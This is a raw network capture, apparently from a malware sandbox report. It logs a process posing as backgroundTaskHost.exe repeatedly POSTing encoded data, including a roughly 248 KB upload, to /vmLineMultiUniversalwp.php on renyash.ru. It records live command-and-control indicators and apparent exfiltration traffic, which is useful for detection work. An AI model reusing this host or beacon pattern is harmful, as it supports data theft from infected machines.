                                                                                          Jan 4, 2025 11:07:58.122347116 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:07:58.467423916 CET2520OUTData Raw: 54 59 5b 53 50 5e 5a 57 5c 5b 52 58 57 5d 58 5d 58 5d 5a 5e 52 57 51 5c 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TY[SP^ZW\[RXW]X]X]Z^RWQ\^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-)9+D7' ((?*#>=&=+4%< ?'_ );!Y#!Y,
                                                                                          Jan 4, 2025 11:07:58.566174030 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:07:58.825326920 CET808INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:07:58 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CyYOlOXmRHXE302rlXLe3Qx7%2Fgg6CGsahgYbEZClRhUqpcrFA3h93Xsbbgz6YdLw%2BDWB2n%2BSRxpU7AzxNxpg6JLhSd85R6HWqbH1qQttFUoQS3xe5jfwW%2Blx%2Bsa2FAZIZK3t9G4U"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6cb6cf530cc6-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3415&min_rtt=1629&rtt_var=4183&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=91720&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          16192.168.2.449758104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:07:58.998178005 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:07:59.342278004 CET2520OUTData Raw: 51 5c 5e 56 50 5c 5a 51 5c 5b 52 58 57 52 58 5a 58 54 5a 5a 52 51 51 5f 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q\^VP\ZQ\[RXWRXZXTZZRQQ_^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.*?48"10'\)%]6=6'-<#V?<?+%$">&Y=!Y#!Y,
                                                                                          Jan 4, 2025 11:07:59.475691080 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:07:59.738610983 CET808INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:07:59 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gqfKjdpTTOlVOWH%2FgfLvJ4QT3cwWsLNxsVwqpgcvFmTcHhAFxnYMGtdkJlY4k8aWLYcMHQDJ9SXGLe78le%2BmDWPtkPWqMNRO9Nl3EH7kiQLOZRS4z%2BTaPVm4LdaH%2BQDgYx%2BkCdPs"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6cbc698b43ac-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3830&min_rtt=1745&rtt_var=4826&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=79210&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          17192.168.2.449769104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:07:59.946829081 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:00.295303106 CET2520OUTData Raw: 51 5c 5e 5f 55 5d 5a 55 5c 5b 52 58 57 58 58 5f 58 57 5a 52 52 54 51 59 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q\^_U]ZU\[RXWXX_XWZRRTQY^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-*07!U14)9!-['.+R :R),+?04[&)!Y#!Y,.
                                                                                          Jan 4, 2025 11:08:00.414685965 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:00.682635069 CET807INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:00 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SZre3P4qi07TEZhfRO8CS01Ic5erODLUP8%2F3ZlKLC3n3EVtZw6Gr0PT1EcbUlKm5MiRxI3nftyn0P5W3KJHA8MU4ah9J9FvSB5CfsCsWTPoGyROkghahdlHltf3XJm%2F%2BDxo%2BHQVn"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6cc24c8e7d0b-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3176&min_rtt=1899&rtt_var=3266&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=120491&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          18192.168.2.449775104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:00.877168894 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:01.232722044 CET2520OUTData Raw: 51 59 5e 52 50 58 5a 5c 5c 5b 52 58 57 58 58 5d 58 54 5a 5d 52 51 51 5a 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: QY^RPXZ\\[RXWXX]XTZ]RQQZ^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.@)#";!&3_*Z1![53#W!.Q(?<0 -&=!Y#!Y,.
                                                                                          Jan 4, 2025 11:08:01.329539061 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:01.587917089 CET810INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:01 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f0PGf%2FdcqqSwvPf3MwfryX0TBEEG5F2ix3URGjz%2FR7Ne5QFLAFNU%2BJEG84O%2BGWMgbhvZW1uN8pPgaE6mQ%2F1%2BOMJT0ERnLMtGPanRpdY6lKkaoJA6iK6UGa5ZrnOMGTrsWtpirPPB"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6cc80bc015a3-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3883&min_rtt=1589&rtt_var=5185&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=73201&cwnd=126&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          19192.168.2.449781104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:01.771512032 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 1844
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          20192.168.2.449782104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:01.830960035 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:02.185900927 CET2520OUTData Raw: 51 5c 5b 57 50 59 5a 57 5c 5b 52 58 57 5e 58 5f 58 5d 5a 5f 52 54 51 5d 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q\[WPYZW\[RXW^X_X]Z_RTQ]^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-=:0 =W'3/><1![&$X?Q#X)<<#X( 7-9*+!Y#!Y,6
                                                                                          Jan 4, 2025 11:08:02.291271925 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:02.565619946 CET811INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:02 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hz1Lzb5o%2FyeuiBO8zcbLfqi%2B%2F%2FFlmVvue64Yj1CxSsg54gh9EpsXnUnudhwsdqStJLAPYEakkHaFBKJu96T0SJcs%2FOlpHHkVe0GMbsk1UlpM5MTEeKmg2GYLX%2FJ6AjMXZOcLuxDV"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6cce0ef87271-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3368&min_rtt=1964&rtt_var=3545&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=110597&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          21192.168.2.449788104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:02.510622978 CET295OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 248156
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:08:02.913868904 CET12360OUTData Raw: 54 5a 5b 52 55 5a 5f 50 5c 5b 52 58 57 5b 58 5d 58 57 5a 5d 52 5d 51 58 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TZ[RUZ_P\[RXW[X]XWZ]R]QX^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.(94T1),5>)Z'-+S!>>(Z<<%'[ [%>+!Y#!Y,"
                                                                                          Jan 4, 2025 11:08:02.918749094 CET2472OUTData Raw: 10 3d 26 2c 09 02 2a 22 3d 58 08 5a 31 5e 58 3d 36 59 23 10 3d 07 10 11 39 2f 58 0f 3f 55 01 1d 2c 54 41 2c 0c 1d 39 5d 33 02 20 3c 05 16 23 32 0b 06 25 1b 2f 55 1e 3e 3c 21 3b 06 35 22 0d 1b 24 5b 0e 3c 0b 5e 0f 02 0d 20 2b 38 2d 08 17 05 0e 3d
                                                                                          Data Ascii: =&,*"=XZ1^X=6Y#=9/X?U,TA,9]3 <#2%/U><!;5"$[<^ +8-=#2# _<?2;42\S]"]Z34=3;?D;?2V^(=<!Y/<$4Y6W+,X1#./)>[7.;'Z\0)?*#>'2)5(T1=$Q!*)X#07;._ 2.'T83QW90?1;^
                                                                                          Jan 4, 2025 11:08:02.918768883 CET2472OUTData Raw: 29 5c 5e 15 32 29 0a 0a 31 41 1b 15 34 17 36 20 06 2d 58 3e 3c 3c 2b 13 24 5b 0d 18 2a 00 07 2f 31 0f 05 5e 02 56 06 23 20 2c 3c 3c 00 22 04 24 24 31 37 07 33 3d 2f 23 0d 33 09 16 0f 2b 07 2e 2c 3e 3c 5e 25 2c 0f 3c 0c 28 5e 14 2a 22 3d 1d 3c 27
                                                                                          Data Ascii: )\^2)1A46 -X><<+$[*/1^V# ,<<"$$173=/#3+.,><^%,<(^*"=<'X<1/X$,Z8 &<!-6#(=Q # >=2W>?#;?^8618&X?W7!;#.9[0:&??YT5A5Y3^5<\R,%>&%'?=:=?)=+8+)65()#%U[$2Y--<(W-0) /Y0,8!
                                                                                          Jan 4, 2025 11:08:02.918817043 CET2472OUTData Raw: 3a 2c 0e 0c 31 00 55 28 3e 5f 28 3e 04 1c 25 57 27 29 33 2f 0a 2b 0b 24 35 5c 03 2d 38 38 0d 05 3b 5d 2d 1a 33 03 34 41 08 28 26 2b 25 33 28 04 29 58 04 5c 08 2c 41 3b 3a 07 23 53 0a 07 0b 17 07 20 38 16 2b 08 20 04 23 58 25 29 35 03 5d 03 00 3c
                                                                                          Data Ascii: :,1U(>_(>%W')3/+$5\-88;]-34A(&+%3()X\,A;:#S 8+ #X%)5]<82![08,A6!5^&FYS?<?:/$Z=)23QX-770.'T?*,98<7:93' !]R*=(<V$!<$?>ZW19\7Z+Q;,:/<"^T(<#W08403.2V, ?1?^6Z#
                                                                                          Jan 4, 2025 11:08:02.918828011 CET2472OUTData Raw: 33 0f 5f 5e 0b 31 0e 07 25 3c 0c 17 3e 5b 2a 15 33 33 03 03 39 39 3f 01 2f 02 09 08 24 59 22 13 0f 3c 33 17 31 56 37 56 3d 55 21 5d 32 22 3a 02 22 14 06 11 3e 5d 0d 00 3e 22 25 2c 2e 56 20 2d 32 1e 54 1c 07 10 27 3c 3a 10 20 1f 09 39 25 5e 27 2e
                                                                                          Data Ascii: 3_^1%<>[*3399?/$Y"<31V7V=U!]2":">]>"%,.V -2T'<: 9%^'.:7#5Y,[6<[2T&W<7%?^R9+:]5^?^:=_0* ):=22$=?A;=1%-'70, *547;/Y6 *Z(9&]4_=Y*9$E$:"0:227=8//7\Z,8=!!W#3W#<!>S0D
                                                                                          Jan 4, 2025 11:08:02.918889999 CET4944OUTData Raw: 35 07 38 1c 0a 26 33 5c 3f 28 03 07 34 00 2f 32 3d 41 48 1a 35 3a 03 42 04 5a 1a 55 35 58 11 1d 0e 23 23 10 33 3f 39 06 3e 3c 27 1e 34 54 0a 14 0e 20 24 28 30 0a 2a 2a 0d 32 2b 14 33 3c 30 13 38 33 12 10 0f 27 39 1b 06 2d 19 1c 13 2f 2d 04 3e 27
                                                                                          Data Ascii: 58&3\?(4/2=AH5:BZU5X##3?9><'4T $(0**2+3<083'9-/->'*T1V07Z'< &6=>/=97&$87-Q;,':W=*.:?&?/5+(T<-"5-?\79"? &?8;9&-\;,&$8<.Q>_"7Q,7#'^(69-:^'!_!?(+<8]"2_%3>?<*:0>(V?)=8
                                                                                          Jan 4, 2025 11:08:02.918930054 CET2472OUTData Raw: 26 05 0c 52 06 0d 03 3a 08 36 39 07 0b 2f 20 5d 14 3c 0c 34 0f 2f 3e 2c 00 5a 17 2c 32 5d 3c 04 06 06 01 54 23 59 39 56 0f 01 50 54 3f 0f 28 15 06 21 45 18 25 33 32 19 38 39 28 1f 2a 29 1d 32 3e 01 0f 26 06 21 0a 1f 3f 3f 27 3c 06 00 33 1a 3c 58
                                                                                          Data Ascii: &R:69/ ]<4/>,Z,2]<T#Y9VPT?(!E%3289(*)2>&!??'<3<X[?&??.T<#+/%S4#-2&(\.R\"[6_#:!8<=&[2:-223, '!"6 +3:4+1>0$2,?%70\1Y;%2$X4\C0/S<?;SX8>X!!P9T(X:2*Y?#?R=3<
                                                                                          Jan 4, 2025 11:08:02.918972969 CET2472OUTData Raw: 37 3a 52 5d 2a 2f 51 39 06 22 24 01 0c 1c 38 07 07 06 21 26 02 24 23 08 29 41 3e 28 2c 5c 26 02 04 5a 3b 52 02 06 23 37 0d 3e 09 27 2a 5b 0c 1d 24 20 01 2d 30 0e 16 39 0c 02 2c 01 05 1f 1c 26 38 09 15 1f 05 2d 27 30 22 54 20 23 08 53 0f 02 3a 12
                                                                                          Data Ascii: 7:R]*/Q9"$8!&$#)A>(,\&Z;R#7>'*[$ -09,&8-'0"T #S:'R0?=V0>%A):, ["?Q1=&0?4&;! "?:)X)& 53*=!=:$&);T-'[<:=$%(":X;<'-0;-Y:<ZV$:Y[2^$3:4?/:6659!+]3->1(SD?"2<>[" 9>(
                                                                                          Jan 4, 2025 11:08:02.919038057 CET4944OUTData Raw: 26 3d 24 16 0e 3b 0f 02 0b 58 58 3f 31 56 0b 07 0c 5a 52 58 2a 58 0f 54 0a 01 02 23 04 0f 1c 51 3f 27 33 1d 3d 2a 31 30 39 5e 39 1e 0c 16 33 5e 0a 16 29 23 3e 5e 27 08 0f 07 39 50 39 0a 20 16 31 05 36 07 23 21 3e 1a 30 04 1d 53 0a 07 26 11 3c 5b
                                                                                          Data Ascii: &=$;XX?1VZRX*XT#Q?'3=*109^93^)#>^'9P9 16#!>0S&<[8?268$^_,>((_);P)912>6Y5[!\2!:9.#4>,0U&'?0X0V83'P6/7X=X1>4201?%/,?Q:&<=-/4^:29?]7=/=U[6>=9$#
                                                                                          Jan 4, 2025 11:08:02.923670053 CET9888OUTData Raw: 33 5b 02 01 2b 34 24 0e 3e 04 5f 5e 06 3c 22 22 35 3f 02 39 3b 19 06 2d 06 5f 35 2f 02 24 30 41 05 27 18 23 32 29 0c 19 36 30 2f 21 05 00 23 32 35 3e 50 39 2a 2d 3d 5f 3f 54 06 5f 00 2d 38 01 20 2c 09 59 03 56 00 39 26 31 15 23 28 59 5c 51 3b 09
                                                                                          Data Ascii: 3[+4$>_^<""5?9;-_5/$0A'#2)60/!#25>P9*-=_?T_-8 ,YV9&1#(Y\Q;8)^-[#-<9-4!<5$ >?%" ><R:*,+$X9"-44+>;<*8S$'=.25T\00\"<#<?!^?Y-+:8_7<>](>W+]88-'9)9-:;?=]>50:+V'?<Y*
                                                                                          Jan 4, 2025 11:08:02.963434935 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:04.312998056 CET805INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:04 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=67IV1oPL6DqIJegVW7tMZJaJ94qw86qdGrZsHm30pzWmfGdrGJ%2BGrYY4aHnOrZGcwVMmPvV0imsXFI62IQk54wir0X0pUKrfgA1mNqy0D2ralJSJPCN6hUPTcigNzylpnfyBddrK"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6cd23b377cf6-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=5051&min_rtt=1912&rtt_var=6995&sent=89&recv=258&lost=0&retrans=0&sent_bytes=25&recv_bytes=248451&delivery_rate=54020&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          22192.168.2.449794104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:03.511189938 CET293OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:08:03.857755899 CET2520OUTData Raw: 54 5e 5e 55 50 5b 5a 55 5c 5b 52 58 57 5d 58 52 58 5d 5a 59 52 57 51 57 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T^^UP[ZU\[RXW]XRX]ZYRWQW^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-))#U'#+>?%!>*0>04-*<,+ 2_)!Y#!Y,
                                                                                          Jan 4, 2025 11:08:03.973232985 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:04.235641956 CET817INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:04 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ml%2BVzVoHHqHF%2Fn6BN9CZc22Clae5eX%2FM2g%2B2%2F67pBsbalGF29QhKT3jmj7xELmeH%2B2x3i0PwbpGtXTcoL4inb%2BIN6E12e%2F1ZEQ5kS%2BwpiCHImN4Fq549dgrg4AXhU4pdjsfVxlZ5"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6cd88da6f791-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=9488&min_rtt=1452&rtt_var=16616&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=22208&cwnd=146&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          23192.168.2.449799104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:04.361984968 CET293OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
